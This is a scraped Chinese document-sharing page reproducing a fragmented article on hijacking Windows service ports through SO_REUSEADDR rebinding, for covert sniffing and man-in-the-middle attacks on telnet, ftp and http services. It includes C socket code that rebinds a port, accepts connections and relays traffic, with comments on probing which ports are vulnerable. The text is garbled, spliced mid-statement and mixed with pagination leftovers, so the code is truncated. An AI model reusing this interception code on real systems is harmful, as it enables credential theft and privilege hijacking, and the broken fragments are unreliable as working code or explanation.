资源描述:
《用端口截听实现隐藏嗅探与攻击》由会员上传分享,免费在线阅读,更多相关内容在学术论文-天天文库。
1、用端口截听实现隐藏嗅探与攻击~教育资源库 在,IPPROTO_TCP);saddr.sin_family=AF_I;saddr.sin_addr.s_addr=htonl(INADDR_ANY);bind(s,(SOCKADDR*)saddr,sizeof(saddr)); 其实这当中存在在非常大的安全隐患,因为在in用户通过你登陆以后,你的应用就完全可以发起中间人攻击,扮演这个登陆的用户通过SOCKET发送高权限的命令,到达入侵的目的。 4.对于构建的S自己的很多服务的SOCKET编程都存在这样的问题,tel,ftp,http的服务实现全部
2、都可以利用这种方法进行攻击,在低权限用户上实现对SYSTEM应用的截听。包括,IPPROTO_TCP))==SOCKET_ERROR){printf(error!socketfailed!);return-1;}val=TRUE;//SO_REUSEADDR选项就是可以实现端口重绑定的if(setsockopt(s,SOL_SOCKET,SO_REUSEADDR,(char*)val,sizeof(val))!=0){printf(error!setsockoptfailed!);return-1;}//如果指定了SO_EXCLUSIVEADDRU
3、SE,就不会绑定成功,返回无权限的错误代码;//如果是想通过重利用端口达到隐藏的目的,就可以动态的测试当前已绑定的端口哪个可以成功,就说明具备这个漏洞,然后动态利用端口使得更隐蔽//其实UDP端口一样可以这样重绑定利用,这儿主要是以TEL服务为例子进行攻击if(bind(s,(SOCKADDR*)saddr,sizeof(saddr))==SOCKET_ERROR){ret=GetLastError();printf(error!bindfailed!);return-1;}listen(s,2);while(1)12下一页友情提醒:,特别!{ca
4、ddsize=sizeof(scaddr);//接受连接请求sc=accept(s,(structsockaddr*)scaddr,caddsize);if(sc!=INVALID_SOCKET){mt=CreateThread(NULL,0,ClientThread,(LPVOID)sc,0,tid);if(mt==NULL){printf(ThreadCreatFailed!);break;}}CloseHandle(mt);}closesocket(s);,IPPROTO_TCP))==SOCKET_ERROR){printf(error!s
5、ocketfailed!);return-1;}val=100;if(setsockopt(sc,SOL_SOCKET,SO_RCVTIMEO,(char*)val,sizeof(val))!=0){ret=GetLastError();return-1;}if(setsockopt(ss,SOL_SOCKET,SO_RCVTIMEO,(char*)val,sizeof(val))!=0){ret=GetLastError();return-1;}if(connect(sc,(SOCKADDR*)saddr,sizeof(saddr))!=0){p
6、rintf(error!socketconnectfailed!);closesocket(sc);closesocket(ss);return-1;}=recv(ss,buf,4096,0);if(num>0)send(sc,buf,num,0);elseif(num==0)break;num=recv(sc,buf,4096,0);if(num>0)send(ss,buf,num,0);elseif(num==0)break;}closesocket(ss);closesocket(sc);return0;}上一页12友情提醒:,特
7、别!
